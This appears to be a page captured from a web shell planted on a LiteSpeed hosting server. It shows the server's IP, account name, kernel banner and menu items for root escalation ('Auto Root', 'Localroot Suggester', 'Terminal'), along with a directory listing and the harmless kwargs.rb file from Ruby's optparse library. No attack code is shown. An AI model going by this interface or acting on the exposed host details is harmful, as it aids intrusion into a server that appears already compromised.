Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
optparse /
Delete
Unzip
Name
Size
Permission
Date
Action
ac.rb
1.99
KB
-rw-r--r--
2025-05-29 14:04
date.rb
368
B
-rw-r--r--
2025-05-29 14:04
kwargs.rb
716
B
-rw-r--r--
2025-05-29 14:04
shellwords.rb
164
B
-rw-r--r--
2025-05-29 14:04
time.rb
231
B
-rw-r--r--
2025-05-29 14:04
uri.rb
143
B
-rw-r--r--
2025-05-29 14:04
version.rb
2.14
KB
-rw-r--r--
2025-05-29 14:04
Save
Rename
# frozen_string_literal: true require_relative '../optparse' class OptionParser # :call-seq: # define_by_keywords(options, method, **params) # # :include: ../../doc/optparse/creates_option.rdoc # # Defines options which set in to _options_ for keyword parameters # of _method_. # # Parameters for each keywords are given as elements of _params_. # def define_by_keywords(options, method, **params) method.parameters.each do |type, name| case type when :key, :keyreq op, cl = *(type == :key ? %w"[ ]" : ["", ""]) define("--#{name}=#{op}#{name.upcase}#{cl}", *params[name]) do |o| options[name] = o end end end options end end